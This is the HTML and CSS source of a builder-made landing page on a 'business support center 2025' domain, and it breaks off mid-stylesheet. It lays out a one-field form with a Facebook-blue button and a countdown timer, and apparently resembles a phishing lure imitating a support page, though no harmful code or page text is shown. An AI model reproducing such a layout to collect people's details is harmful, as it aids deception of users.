<!DOCTYPE html>
<html version="4">

<head>
  <meta charset="UTF-8" />
  <title></title>
  <meta name="keywords" content="">
  <meta name="description" content="">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <script type="text/javascript">
    !function (e, t, i) { var a, n = e.innerWidth; if (e[i] = (true || n < 768) ? "mobile" : "desktop", "desktop" == e[i]) a = "width=" + 960 + ", user-scalable=no, initial-scale=1.0"; else { var o = 1; w = 420; w != n && (o = n / w), a = "width=" + w + ", user-scalable=no, initial-scale=" + o + ", minimum-scale=" + o + ", maximum-scale=" + o } var l = t.createElement("meta"); l.name = "viewport", l.setAttribute("content", a), t.head.appendChild(l) }(window, document, "DISPLAY");
  </script>

  <link rel="canonical" href="https://www.businesssupportcenter2025.online/2">
  <meta property="og:url" content="https://www.businesssupportcenter2025.online/2">

  <meta property="og:title" content="">
  <meta property="og:type" content="website">
  <meta property="og:image" content="">
  <meta property="og:description" content="">
  <meta name="format-detection" content="telephone=no">
  <link rel="icon" href="" sizes="16x16" />
  <link rel="dns-prefetch" href="https://statics.pancake.vn">
  <link rel="dns-prefetch" href="https://content.pancake.vn">
  <link rel="dns-prefetch" href="https://www.youtube.com">
  <link rel="dns-prefetch" href="https://a.pancake.vn">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin>
  <link rel="preconnect" href="https://fonts.googleapis.com/" crossorigin>

  <style type="text/css">
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
      outline: 0;
      -webkit-font-smoothing: antialiased;
      -moz-osx-font-smoothing: grayscale;
      font: inherit;
      border: 0
    }

    html {
      font-size: 12px;
      line-height: 1.5;
      -webkit-tap-highlight-color: transparent;
      font-family: 'Roboto', sans-serif;
      font-feature-settings: 'tnum'
    }

    body {
      background-color: #fff;
      font-size: 12px;
      color: #000
    }

    .pageview {
      overflow: hidden
    }

    .lazy {
      background: none !important;
      -webkit-mask-image: none !important
    }

    ol,
    ul {
      list-style: none
    }

    b {
      font-weight: bold
    }

    .visibility-hidden {
      visibility: hidden !important
    }

    .cursor-pointer {
      cursor: pointer
    }

    .full-height {
      height: 100%
    }

    .full-width {
      width: 100%
    }

    .full-mask-size {
      -webkit-mask-size: 100% 100%
    }

    .mask-position {
      -webkit-mask-position: 0% 0%
    }

    .u-select-none {
      user-select: none;
      -webkit-user-select: none;
      -moz-user-select: none;
      -ms-user-select: none
    }

    .p-absolute {
      position: absolute
    }

    .p-relative {
      position: relative
    }

    .gallery-view-icon-next img,
    .gallery-view-icon-prev img,
    .carousel-icon-next img,
    .carousel-icon-prev img {
      width: 25px;
      height: 25px;
      filter: drop-shadow(0 0 1px black)
    }

    .icon-play-video {
      position: absolute;
      width: 60px;
      height: 60px;
      top: calc(50% - 30px);
      left: calc(50% - 30px);
      cursor: pointer;
      background-position: center center;
      background-size: cover;
      background-repeat: no-repeat;
      background-image: url(https://content.pancake.vn/1.1/30/5a/c2/93/9ec72c8ce8898050035dddbb989c950bc1faabdc1fdcc11175dea467.svg)
    }

    .player-btn-unmute {
      position: absolute;
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
      margin: auto;
      cursor: pointer
    }

    .player-btn-unmute>div {
      content: "";
      position: absolute;
      width: 60px;
      height: 60px;
      top: calc(50% - 30px);
      left: calc(50% - 30px);
      background-size: 90%;
      background-color: rgba(0, 0, 0, .5);
      border-radius: 100%;
      background-repeat: no-repeat;
      background-position: center center;
      background-image: url("data:image/svg+xml;utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2036%2036%22%20width%3D%22100%25%22%20height%3D%22100%25%22%20fill%3D%22%23fff%22%3E%3Cpath%20d%3D%22m%2021.48%2C17.98%20c%200%2C-1.77%20-1.02%2C-3.29%20-2.5%2C-4.03%20v%202.21%20l%202.45%2C2.45%20c%20.03%2C-0.2%20.05%2C-0.41%20.05%2C-0.63%20z%20m%202.5%2C0%20c%200%2C.94%20-0.2%2C1.82%20-0.54%2C2.64%20l%201.51%2C1.51%20c%20.66%2C-1.24%201.03%2C-2.65%201.03%2C-4.15%200%2C-4.28%20-2.99%2C-7.86%20-7%2C-8.76%20v%202.05%20c%202.89%2C.86%205%2C3.54%205%2C6.71%20z%20M%209.25%2C8.98%20l%20-1.27%2C1.26%204.72%2C4.73%20H%207.98%20v%206%20H%2011.98%20l%205%2C5%20v%20-6.73%20l%204.25%2C4.25%20c%20-0.67%2C.52%20-1.42%2C.93%20-2.25%2C1.18%20v%202.06%20c%201.38%2C-0.31%202.63%2C-0.95%203.69%2C-1.81%20l%202.04%2C2.05%201.27%2C-1.27%20-9%2C-9%20-7.72%2C-7.72%20z%20m%207.72%2C.99%20-2.09%2C2.08%202.09%2C2.09%20V%209.98%20z%22%3E%3C%2Fpath%3E%3C%2Fsvg%3E")
    }

    .d-none {
      display: none
    }

    a:link,
    a:visited {
      color: inherit
    }

    a {
      text-decoration: none
    }

    .section-container {
      margin: auto
    }

    .image-block-css {
      overflow: hidden
    }

    .image-background,
    .image-background-compare {
      margin: 0 auto
    }

    .image-background-compare {
      top: 0;
      left: 0;
      width: 100%;
      height: 100%
    }

    .image-compare-line {
      position: absolute;
      top: 50%;
      left: 50%;
      z-index: 40;
      width: 38px;
      height: 38px;
      margin-top: -22px;
      margin-left: -22px;
      cursor: pointer;
      border: 3px solid #fff;
      border-radius: 1000px;
      -webkit-box-shadow: 0px 0px 12px rgba(51, 51, 51, 0.5);
      box-shadow: 0px 0px 12px rgba(51, 51, 51, 0.5)
    }

    .image-compare-left-arrow,
    .image-compare-right-arrow {
      top: 50%;
      margin-top: -6px;
      position: absolute;
      width: 0;
      height: 0;
      border: 6px inset transparent
    }

    .image-compare-left-arrow {
      left: 50%;
      margin-left: -17px;
      border-right: 6px solid #fff
    }

    .image-compare-right-arrow {
      right: 50%;
      margin-right: -17px;
      border-left: 6px solid #fff
    }

    .image-compare-line:before,
    .image-compare-line:after {
      position: absolute;
      z-index: 30;
      display: block;
      content: " ";
      background: #fff
    }

    .image-compare-line:before {
      left: 50%;
      width: 3px;
      height: 9999px;
      bottom: 50%;
      margin-bottom: 22px;
      -webkit-box-shadow: 0 3px 0 #fff, 0px 0px 12px rgba(51, 51, 51, 0.5);
      box-shadow: 0 3px 0 #fff, 0px 0px 12px rgba(51, 51, 51, 0.5)
    }

    .image-compare-line:after {
      left: 50%;
      width: 3px;
      height: 9999px;
      top: 50%;
      margin-top: 22px;
      -webkit-box-shadow: 0 -3px 0 #fff, 0px 0px 12px rgba(51, 51, 51, 0.5);
      box-shadow: 0 -3px 0 #fff, 0px 0px 12px rgba(51, 51, 51, 0.5)
    }

    .text-block-css {
      display: inline-block;
      word-break: break-word;
      -webkit-background-clip: text !important
    }

    .animationText span {
      display: inline-block
    }

    .animationText .bar {
      position: absolute;
      height: 100%;
      width: 3px;
      background: currentColor;
      top: 0;
      right: 0
    }

    .animate-word-wrapper {
      position: relative;
      overflow: hidden;
      vertical-align: top;
      transition: width .6s;
      text-align: start
    }

    .animate-word-wrapper>span {
      white-space: nowrap;
      position: absolute;
      top: 0;
      left: 0;
      font: inherit
    }

    .animate-word-wrapper span i {
      font: inherit;
      font-style: initial;
      display: inline-block;
      backface-visibility: hidden;
      -webkit-backface-visibility: hidden
    }

    .animate-word-wrapper span i.in {
      animation-name: rotate-3-in;
      animation-fill-mode: forwards;
      animation-duration: .6s
    }

    .animate-word-wrapper span i.out {
      animation-name: rotate-3-out;
      animation-fill-mode: forwards;
      animation-duration: .6s
    }

    .animationText .hidden {
      opacity: 0;
      z-index: -1
    }

    .animationText .visible {
      opacity: 1;
      position: relative
    }

    .inline {
      display: inline !important
    }

    .caret-dummy {
      animation: caret-popping 1s infinite
    }

    .caret {
      transform: scaleY(1.3) translateY(-3%)
    }

    @keyframes rotate-3-out {
      0% {
        transform: rotateY(0);
        -webkit-transform: rotateY(0)
      }

      100% {
        transform: rotateY(-180deg);
        -webkit-transform: rotateY(-180deg)
      }
    }

    @-webkit-keyframes rotate-3-out {
      0% {
        transform: rotateY(0);
        -webkit-transform: rotateY(0)
      }

      100% {
        transform: rotateY(-180deg);
        -webkit-transform: rotateY(-180deg)
      }
    }

    @keyframes rotate-3-in {
      0% {
        transform: rotateY(180deg);
        -webkit-transform: rotateY(180deg)
      }

      100% {
        transform: rotateY(0);
        -webkit-transform: rotateY(0)
      }
    }

    @-webkit-keyframes rotate-3-in {
      0% {
        transform: rotateY(180deg);
        -webkit-transform: rotateY(180deg)
      }

      100% {
        transform: rotateY(0);
        -webkit-transform: rotateY(0)
      }
    }

    @keyframes caret-popping {
      0% {
        opacity: 0
      }

      50% {
        opacity: 1
      }

      100% {
        opacity: 0
      }
    }

    .input-number-quantity-css {
      width: 100%;
      height: 100%;
      overflow: hidden;
      display: flex;
      user-select: none
    }

    .input-number-quantity-css .minus,
    .plus {
      display: flex;
      align-items: center;
      justify-content: center;
      flex-shrink: 0;
      cursor: pointer
    }

    .input-number-quantity-css .minus {
      border-right: inherit
    }

    .input-number-quantity-css .plus {
      border-left: inherit
    }

    .input-number-quantity-css input {
      text-align: center;
      background: transparent;
      color: inherit;
      width: 100%;
      height: 100%;
      border: 0;
      outline: none;
      padding-left: 10px;
      padding-right: 10px;
      box-sizing: border-box;
      border-radius: 0
    }

    .input-number-quantity-css input::placeholder {
      color: #979797;
      -webkit-text-fill-color: #979797
    }

    .input-number-quantity-css input::-webkit-outer-spin-button,
    .input-number-quantity-css input::-webkit-inner-spin-button {
      -webkit-appearance: none;
      margin: 0
    }

    .input-number-quantity-css input[type=number] {
      -moz-appearance: textfield
    }

    .field-error {
      top: 0;
      right: 0;
      position: absolute;
      height: 100%;
      width: 30px
    }

    .field-error img {
      width: 16px;
      height: 16px;
      position: absolute;
      left: calc(50% - 8px);
      top: calc(50% - 8px)
    }

    .input-css {
      overflow: hidden
    }

    .input-css input {
      background: transparent;
      color: inherit;
      padding-left: 10px;
      border-radius: 0;
      text-align: inherit;
      letter-spacing: inherit
    }

    .input-css input::placeholder {
      text-transform: var(--placeholder-transform);
      text-decoration: var(--placeholder-decoration)
    }

    .input-datetime {
      overflow: hidden
    }

    .input-datetime input {
      background: transparent;
      width: 100%;
      height: 100%;
      padding-left: 10px;
      padding-right: 10px;
      border-radius: 0;
      box-sizing: border-box;
      -webkit-appearance: textfield;
      -moz-appearance: textfield;
      text-align: inherit;
      letter-spacing: inherit
    }

    .input-datetime input::placeholder {
      text-transform: var(--placeholder-transform);
      text-decoration: var(--placeholder-decoration)
    }

    .input-datetime .input-datetime-placeholder {
      position: absolute;
      top: 0;
      padding-left: 12px;
      height: 100%;
      width: 100%;
      align-items: center;
      display: flex;
      z-index: -1
    }

    .input-file {
      overflow: hidden;
      display: flex;
      display: -webkit-flex;
      align-items: center;
      -webkit-align-items: center;
      justify-content: space-between;
      -webkit-justify-content: space-between;
      padding: 0 10px;
      cursor: pointer
    }

    .input-file .title {
      overflow: hidden;
      white-space: nowrap;
      text-overflow: ellipsis
    }

    .input-file input[type="file"] {
      opacity: 0;
      cursor: pointer;
      top: 0;
      left: 0
    }

    .textarea-css {
      width: 100%;
      height: 100%;
      overflow: hidden
    }

    .textarea-css textarea {
      background: transparent;
      padding-top: 6px;
      padding-bottom: 0;
      color: inherit;
      padding-left: 10px;
      border-radius: 0;
      text-align: inherit;
      letter-spacing: inherit
    }

    .textarea-css textarea::placeholder {
      text-transform: var(--placeholder-transform);
      text-decoration: var(--placeholder-decoration)
    }

    .com-checkbox-group {
      min-height: 40px
    }

    .checkbox-group-css {
      display: flex;
      display: -webkit-flex;
      flex-direction: row;
      -webkit-flex-direction: row;
      flex-wrap: wrap;
      -webkit-flex-wrap: wrap;
      padding-left: 10px;
      min-height: 40px
    }

    .checkbox-group-item {
      display: flex;
      display: -webkit-flex;
      align-items: center;
      -webkit-align-items: center
    }

    .checkbox-group-input {
      margin-right: 10px;
      width: 13px;
      height: 13px;
      min-width: 13px;
      min-height: 13px
    }

    .com-radio {
      min-height: 40px;
      height: auto !important
    }

    .radio-css {
      min-height: 40px;
      display: flex;
      display: -webkit-flex;
      flex-direction: row;
      -webkit-flex-direction: row;
      flex-wrap: wrap;
      -webkit-flex-wrap: wrap
    }

    .radio-item {
      display: flex;
      display: -webkit-flex;
      align-items: center;
      -webkit-align-items: center;
      border-radius: 5px;
      padding-left: 10px
    }

    .radio-input {
      margin-right: 10px;
      width: 13px;
      height: 13px;
      min-width: 13px;
      min-height: 13px
    }

    .select-css {
      overflow: hidden;
      padding-top: 0;
      padding-bottom: 0
    }

    .select-css select {
      text-align: inherit;
      letter-spacing: inherit
    }

    .select-css option:first-child {
      color: #979797
    }

    .chevron {
      pointer-events: none;
      color: #979797;
      position: absolute;
      right: 0;
      width: 26px;
      height: 100%;
      top: 0
    }

    .chevron .icon {
      position: absolute;
      display: block;
      width: 14px;
      height: 14px;
      border: 2px solid transparent;
      border-radius: 100px;
      top: calc(50% - 7px);
      left: calc(50% - 7px)
    }

    .chevron .icon::after {
      content: "";
      display: block;
      position: absolute;
      width: 6px;
      height: 6px;
      border-bottom: 2px solid;
      border-right: 2px solid;
      transform: rotate(45deg);
      -webkit-transform: rotate(45deg)
    }

    .select-css select {
      background: transparent;
      padding-right: 26px;
      padding-left: 10px;
      appearance: none;
      -webkit-appearance: none;
      -moz-appearance: none;
      -o-appearance: none;
      color: #979797
    }

    .select-css select.select {
      color: inherit
    }

    .address-css {
      overflow: hidden
    }

    .address-css .select-container {
      color: inherit;
      padding-top: 0;
      padding-bottom: 0;
      border-radius: 0;
      display: flex;
      display: -webkit-flex;
      justify-content: space-between;
      -webkit-justify-content: space-between
    }

    .address-css .select-field {
      height: 100%;
      flex: 1;
      position: relative
    }

    .address-css select {
      background: transparent;
      padding-left: 10px;
      padding-right: 26px;
      width: 100%;
      appearance: none;
      -webkit-appearance: none;
      -moz-appearance: none;
      -o-appearance: none;
      height: 100%;
      color: #979797
    }

    .address-css select.select {
      color: inherit
    }

    .address-css select option:first-child {
      color: #979797
    }

    .address-column {
      background: transparent !important;
      border-width: 0 !important
    }

    .address-column .select-column {
      flex-direction: column;
      border-radius: inherit !important;
      border-color: inherit !important;
      border-style: inherit !important
    }

    .address-column .select-column .select-field {
      width: 100%;
      border-radius: inherit;
      border-width: 1px;
      border-color: inherit;
      border-style: inherit;
      overflow: hidden
    }

    .detect-address-select-wrapper {
      background: #fff;
      border-radius: 4px;
      display: flex;
      flex-direction: column;
      padding: 4px;
      transition: max-height .3s ease-in-out, visibility .3s ease-in-out, scale .3s, opacity .3s;
      max-height: 0;
      scale: 0.5;
      opacity: 0;
      overflow: hidden scroll;
      border: 1px solid rgba(217, 217, 217, 1)
    }

    .detect-address-select-wrapper::-webkit-scrollbar-thumb {
      background-color: #d4d4d4;
      border-radius: 8px
    }

    .detect-address-select-wrapper::-webkit-scrollbar-thumb:hover {
      background-color: #808080
    }

    .detect-address-select-wrapper::-webkit-scrollbar-track {
      background-color: #fff
    }

    .detect-address-select-wrapper::-webkit-scrollbar {
      background-color: transparent;
      width: 6px
    }

    .detect-address-select-option {
      padding: 6px 8px;
      cursor: pointer;
      border-radius: 2px
    }

    .detect-address-select-option:hover {
      background-color: #e5e5e5
    }

    .icon-container {
      position: absolute;
      left: calc(50% - 10px);
      top: calc(50% - 10px)
    }

    .loader {
      position: relative;
      height: 20px;
      width: 20px;
      display: inline-block;
      animation: around 5.4s infinite
    }

    @keyframes around {
      0% {
        transform: rotate(0deg)
      }

      100% {
        transform: rotate(360deg)
      }
    }

    .loader::after,
    .loader::before {
      content: "";
      background: white;
      position: absolute;
      display: inline-block;
      width: 100%;
      height: 100%;
      border-width: 2px;
      border-color: #333 #333 transparent transparent;
      border-style: solid;
      border-radius: 20px;
      box-sizing: border-box;
      top: 0;
      left: 0;
      animation: around 0.7s ease-in-out infinite
    }

    .loader::after {
      animation: around 0.7s ease-in-out 0.1s infinite;
      background: transparent
    }

    .button-loader,
    .button-loader:before,
    .button-loader:after {
      border-radius: 50%;
      width: 1.3em;
      height: 1.3em;
      animation-fill-mode: both;
      animation: bblFadInOut 1.8s infinite ease-in-out
    }

    .button-loader {
      color: #FFF;
      font-size: 7px;
      position: relative;
      text-indent: -9999em;
      transform: translateZ(0);
      animation-delay: -0.16s;
      display: none;
      top: -17px
    }

    .button-loader:before,
    .button-loader:after {
      content: '';
      position: absolute;
      top: 0
    }

    .button-loader:before {
      left: -3.5em;
      animation-delay: -0.32s
    }

    .button-loader:after {
      left: 3.5em
    }

    @keyframes bblFadInOut {

      0%,
      80%,
      100% {
        box-shadow: 0 2.5em 0 -1.3em
      }

      40% {
        box-shadow: 0 2.5em 0 0
      }
    }

    .com-button {
      cursor: pointer;
      user-select: none;
      -webkit-user-select: none;
      transition: transform 200ms ease-out;
      -webkit-transition: transform 200ms ease-out
    }

    .com-button:active {
      transform: translateY(5px);
      -webkit-transform: translateY(5px)
    }

    .button-css {
      display: flex;
      display: -webkit-flex;
      align-items: center;
      -webkit-align-items: center;
      justify-content: center;
      -webkit-justify-content: center;
      text-align: center
    }

    .button-text {
      display: table-cell;
      vertical-align: middle;
      text-align: unset
    }

    .countdown-wrapper {
      display: flex;
      display: -webkit-flex;
      pointer-events: none;
      font-size: 20px
    }

    .countdown-message {
      width: 100%;
      position: absolute;
      height: 100%;
      top: 0;
      left: 0;
      background: #000;
      color: #fff;
      display: flex;
      align-items: center;
      justify-content: center
    }

    .countdown-item {
      display: flex;
      display: -webkit-flex;
      justify-content: center;
      -webkit-justify-content: center;
      font: inherit;
      align-items: center;
      -webkit-align-items: center;
      width: calc((100% - 40px)/4);
      height: calc(100% - 10px);
      margin: 5px;
      flex-direction: column;
      -webkit-flex-direction: column
    }

    .countdown-wrapper .timer-number-wrapper {
      display: flex
    }

    .countdown-wrapper .timer-number {
      overflow: hidden;
      position: relative
    }

    .countdown-wrapper .timer-number .show {
      transition-property: transform;
      transition-duration: .3s;
      transition-timing-function: ease;
      transform: translateY(0%)
    }

    .countdown-wrapper .timer-number .next {
      transition-property: transform;
      transition-duration: .3s;
      transition-timing-function: ease;
      position: absolute;
      transform: translateY(0%)
    }

    .countdown-item .text {
      font-size: .8em
    }

    .popup-wrapper {
      top: 0;
      left: 0
    }

    .popup-background {
      overflow: hidden
    }

    .popup-backdrop {
      background: rgba(0, 0, 0, .5);
      position: fixed;
      top: 0;
      left: 0;
      z-index: 1000000
    }

    .popup-center {
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
      margin: auto
    }

    .popup-top-left {
      top: 0;
      left: 0
    }

    .popup-top-center {
      top: 0;
      left: 50%;
      transform: translate3d(-50%, 0, 0);
      -webkit-transform: translate3d(-50%, 0, 0)
    }

    .popup-top-right {
      top: 0;
      right: 0
    }

    .popup-center-left {
      left: 0;
      top: 50%;
      transform: translate3d(0, -50%, 0);
      -webkit-transform: translate3d(0, -50%, 0)
    }

    .popup-center-right {
      right: 0;
      top: 50%;
      transform: translate3d(0, -50%, 0);
      -webkit-transform: translate3d(0, -50%, 0)
    }

    .popup-bottom-left {
      bottom: 0;
      left: 0
    }

    .popup-bottom-center {
      bottom: 0;
      left: 50%;
      transform: translate3d(-50%, 0, 0);
      -webkit-transform: translate3d(-50%, 0, 0)
    }

    .popup-bottom-right {
      bottom: 0;
      right: 0
    }

    .overlay {
      pointer-events: none;
      width: 100%;
      height: 100%;
      position: absolute;
      top: 0;
      left: 0;
      border-radius: inherit
    }

    .cart-quantity-css {
      overflow: hidden;
      display: flex;
      display: -webkit-flex
    }

    .cart-quantity-css .minus {
      border-right: inherit
    }

    .cart-quantity-css .plus {
      border-left: inherit
    }

    .cart-quantity-css input {
      text-align: center;
      background: transparent;
      color: inherit;
      padding-left: 10px;
      padding-right: 10px;
      border-radius: 0;
      -moz-appearance: textfield
    }

    .cart-quantity-css input::-webkit-outer-spin-button,
    .cart-quantity-css input::-webkit-inner-spin-button {
      -webkit-appearance: none
    }

    .cart-quantity-css .minus,
    .cart-quantity-css .plus {
      display: flex;
      display: -webkit-flex;
      align-items: center;
      -webkit-align-items: center;
      justify-content: center;
      -webkit-justify-content: center;
      flex-shrink: 0;
      -webkit-flex-shrink: 0;
      user-select: none;
      cursor: pointer;
      -webkit-user-select: none;
      width: 40px
    }

    .product-attr-selected {
      top: 0;
      left: 0;
      overflow: hidden
    }

    .lightbox-btn-close {
      background-color: #a8a8a8;
      width: 21px;
      height: 21px;
      position: absolute;
      cursor: pointer
    }

    .lightbox-btn-close>span {
      position: absolute;
      z-index: 9999;
      width: 14px;
      height: 14px;
      top: calc(50% - 7px);
      left: calc(50% - 7px);
      -webkit-mask-size: 100% 100%;
      -webkit-mask-position: 0% 0%;
      background: #fff;
      -webkit-mask-image: url(data:image/svg+xml;base64,PHN2ZyBwcmVzZXJ2ZUFzcGVjdFJhdGlvPSdub25lJyAgd2lkdGg9JzE0JyBoZWlnaHQ9JzE0JyB2aWV3Qm94PScwIDAgMTQgMTQnIGZpbGw9J25vbmUnIHhtbG5zPSdodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2Zyc+PHBhdGggZD0nTTEyLjU5IDBMNyA1LjU5TDEuNDEgMEwwIDEuNDFMNS41OSA3TDAgMTIuNTlMMS40MSAxNEw3IDguNDFMMTIuNTkgMTRMMTQgMTIuNTlMOC40MSA3TDE0IDEuNDFMMTIuNTkgMFonIGZpbGw9JyMyRTNBNTknLz48L3N2Zz4=)
    }

    .lightbox-image,
    .lightbox-video,
    .lightbox-iframe {
      position: absolute;
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
      margin: auto;
      max-width: 80%;
      max-height: 80%
    }

    .lightbox-iframe {
      width: 100%;
      height: 100%
    }

    .lightbox-backdrop {
      width: 100%;
      background: rgba(0, 0, 0, .5);
      height: 100%;
      position: fixed;
      top: 0;
      left: 0;
      z-index: 1000000000;
      touch-action: none
    }

    .w-alert-message-wrapper {
      position: fixed;
      top: 15px;
      z-index: 999999;
      left: 50%;
      padding: 10px 16px;
      border: 1px solid var(--color-alert, #15942A);
      -webkit-transform: translateX(-50%);
      -ms-transform: translateX(-50%);
      transform: translateX(-50%);
      --transform-translateX: -50%;
      background: white;
      border-radius: 8px;
      -webkit-box-shadow: 0px 2px 8px 0px rgba(0, 0, 0, 0.15);
      box-shadow: 0px 2px 8px 0px rgba(0, 0, 0, 0.15);
      display: -webkit-box;
      display: -ms-flexbox;
      display: flex;
      -webkit-box-align: stretch;
      -ms-flex-align: stretch;
      align-items: stretch;
      -webkit-box-pack: center;
      -ms-flex-pack: center;
      justify-content: center
    }

    .w-alert-message {
      display: -webkit-box;
      display: -ms-flexbox;
      display: flex;
      -webkit-box-align: center;
      -ms-flex-align: center;
      align-items: center;
      -webkit-box-pack: center;
      -ms-flex-pack: center;
      justify-content: center
    }

    .w-alert-message .icon {
      line-height: 22px;
      display: -webkit-box;
      display: -ms-flexbox;
      display: flex;
      -webkit-box-align: center;
      -ms-flex-align: center;
      align-items: center;
      -webkit-box-pack: center;
      -ms-flex-pack: center;
      justify-content: center;
      margin-left: 0px;
      margin-right: 6px
    }

    .w-alert-message span.close-icon {
      margin-left: 6px;
      margin-right: 0px;
      color: #80808085;
      cursor: pointer
    }

    .login-popup-wrapper .backdrop-login {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: rgba(0, 0, 0, .5);
      display: none;
      z-index: 99
    }

    .login-popup-wrapper .popup-default-login {
      position: fixed;
      top: 45%;
      left: 50%;
      width: 400px;
      height: 160px;
      transform: translate(-50%, -50%);
      z-index: 999;
      display: none;
      max-width: calc(100% - 50px);
      border: 1px solid rgba(0, 0, 0, .3);
      background-color: #fff;
      border-radius: 10px
    }

    .login-popup-wrapper .popup-default-login .popup-login-title {
      background-color: rgba(6, 21, 40, .05);
      color: #000;
      padding: 12px 15px;
      font-weight: 600;
      font-size: 16px;
      border-top-left-radius: 10px;
      border-top-right-radius: 10px
    }

    .login-popup-wrapper .popup-default-login .popup-login-content {
      font-size: 14px;
      padding: 0 20px;
      margin-top: 10px;
      line-height: 18px;
      -webkit-line-clamp: 3;
      -webkit-box-orient: vertical;
      overflow: hidden;
      text-overflow: ellipsis;
      display: -webkit-box
    }

    .login-popup-wrapper .popup-default-login .popup-login-btn {
      display: block;
      position: absolute;
      right: 15px;
      bottom: 10px;
      margin: 0 auto;
      padding: 10px 0;
      border: none;
      width: 80px;
      text-transform: uppercase;
      text-align: center;
      color: #000;
      background-color: #e6e6e6;
      border-radius: 5px;
      text-decoration: none;
      font-size: 14px;
      font-weight: 600;
      cursor: pointer
    }
  </style>
  <style type="text/css" media="screen and (min-width: 768px)">
    .section-container {
      max-width: 420px;
    }

    .section-wrapper {
      margin: 0 auto;
      max-width: 420px;
    }

    .pageview {
      max-width: 420px;
      margin: 0 auto;
    }

    #w-86cdpbjt {
      top: 0px;
      left: 0px;
      position: relative;
      width: 420px;
      height: 800px;
    }

    #w-86cdpbjt .section-wrapper {
      opacity: 1;
    }

    #w-86cdpbjt {
      margin-bottom: -1px;
    }

    #w-86cdpbjt .section-background {
      background: undefined;
      --type: 0;
    }

    #w-hzit1mqz {
      top: -36.99997138977051px;
      left: -0.0113525390625px;
      width: 422px;
      height: 902px;
    }

    #w-hzit1mqz .image-block-css {
      position: absolute;
      border-style: solid;
      border-width: 0px;
      border-color: rgba(123, 123, 123, 1);
      z-index: null;
      font-size: 14px;
      border-radius: 0px;
    }

    #w-hzit1mqz .image-background {
      width: 422px;
      height: 902px;
      top: 0px;
      left: 0px;
      background: center center/ cover no-repeat scroll content-box border-box url("https://content.pancake.vn/1/fwebp/08/04/a1/fe/99dfbb8ca09c4ede2a7a213dcd60845ba979dfcf8c25c63151db3a19-w:591-h:1280-l:17933-t:image/jpeg.jpg");
      --type: 0;
    }

    #w-hzit1mqz .image-background-compare {
      background: undefined;
      clip: rect(0, 211px, 902px, 0);
      --type: 0;
    }

    #w-tnpw7w17 {
      top: 15.99715805053711px;
      left: 16px;
      width: 265px;
      height: 21.008522033691406px;
    }

    #w-tnpw7w17 .text-block {
      background: null;
    }

    #w-tnpw7w17 .text-block-css {
      text-align: left;
      font-size: 14px;
      border-style: solid;
      border-color: rgba(229, 231, 235, 1);
      --type: 0;
    }

    #w-hzum4vlb {
      top: 37.008548736572266px;
      left: 15.99432373046875px;
      width: 323px;
      height: 29.999998092651367px;
    }

    #w-hzum4vlb .text-block {
      background: null;

    }

    #w-hzum4vlb .text-block-css {
      text-align: left;
      font-size: 20px;
      font-weight: bold;
      border-style: solid;
      border-color: rgba(229, 231, 235, 1);
      --type: 0;
    }

    #w-pau1lxw5 {
      top: 67.00570487976074px;
      left: 15.99432373046875px;
      width: 385px;
      height: 21.008522033691406px;
    }

    #w-pau1lxw5 .text-block {
      background: null;
    }

    #w-pau1lxw5 .text-block-css {
      text-align: left;
      font-size: 14px;
      border-style: solid;
      border-color: rgba(229, 231, 235, 1);
      --type: 0;
    }

    #w-bur0wryt {
      top: 98px;
      left: 15.99432373046875px;
      width: 389px;
      height: 171px;
    }

    #w-bur0wryt .image-block-css {
      position: absolute;
      border-style: solid;
      border-width: 0px;
      border-color: rgba(229, 231, 235, 1);
    }

    #w-bur0wryt .image-background {
      width: 389px;
      height: 171px;
      top: 0px;
      left: 0px;
      background: center center/ cover no-repeat scroll content-box border-box url("https://content.pancake.vn/1/fwebp/0f/4c/28/01/a047edfe181123bfb94492b086d20bdd1459f1bb87d528f27b463477-w:1005-h:441-l:30871-t:image/png.png");
      --type: 0;
    }

    #w-bur0wryt .image-background-compare {
      background: undefined;
      clip: rect(0, 194.5px, 171px, 0);
      --type: 0;
    }

    #w-qxvudeva {
      top: 278px;
      left: 16px;
      width: 389px;
      height: 124px;
    }

    #w-qxvudeva form {
      border-radius: 8px;
      font-size: 13px;
    }

    #w-qxvudeva {}

    #w-imaso3h2 {
      top: 0px;
      left: 0px;
      width: 389px;
      height: 47px;
    }

    #w-imaso3h2 .input-css {
      border-width: 1px;
      border-style: solid;
      border-color: #d9d9d9;
      border-radius: 8px;
    }

    #w-imaso3h2 input {
      background: #fff;
    }

    #w-imaso3h2 input::placeholder {
      color: #979797;
      -webkit-text-fill-color: #979797 !important;
    }

    #w-4k5no89y {
      top: 86px;
      left: 0px;
      width: 389px;
      height: 38px;
    }

    #w-4k5no89y .button-css {
      border-radius: 100px;
      color: rgba(255, 255, 255, 1);
      font-size: 14px;
      border-style: solid;
      border-color: rgba(229, 231, 235, 1);
      background: rgba(24, 119, 242, 1.000);
      --type: 0;
    }

    #w-un574afh {
      top: 337.99573135375977px;
      left: 19px;
      width: 156px;
      height: 17.99715805053711px;
    }

    #w-un574afh .text-block {
      background: null;
    }

    #w-un574afh .text-block-css {
      text-align: left;
      font-size: 12px;
      border-style: solid;
      border-color: rgba(86, 83, 83, 1.000);
      -webkit-text-stroke: 0px rgba(141, 147, 171, 1);
      color: rgba(86, 83, 83, 1);
      --type: 0;
    }

    #w-y87ma2az {
      top: 330px;
      left: 148px;
      width: 128px;
      height: 34px;
    }

    #w-y87ma2az .countdown-item {
      color: rgba(86, 83, 83, 1.000);
      background: null;
      font-size: 12px;
      margin-right: 0px;
      margin-left: 0px;
      border-style: solid;
      border-width: 0px;
      border-color: rgba(229, 231, 235, 1);
      -webkit-text-stroke: 0px rgba(255, 255, 255, 1);
    }

    #w-ewxwa45x {
      top: 337.99432373046875px;
      left: 169px;
      width: 210px;
      height: 17.99715805053711px;
    }

    #w-ewxwa45x .text-block {
      background: null;
    }

    #w-ewxwa45x .text-block-css {
      text-align: left;
      font-size: 12px;
      border-style: solid;
      border-color: rgba(229, 231, 235, 1);
      --type: 0;
    }

    #w-uz8kyfs5 {
      top: 414.0170397758484px;
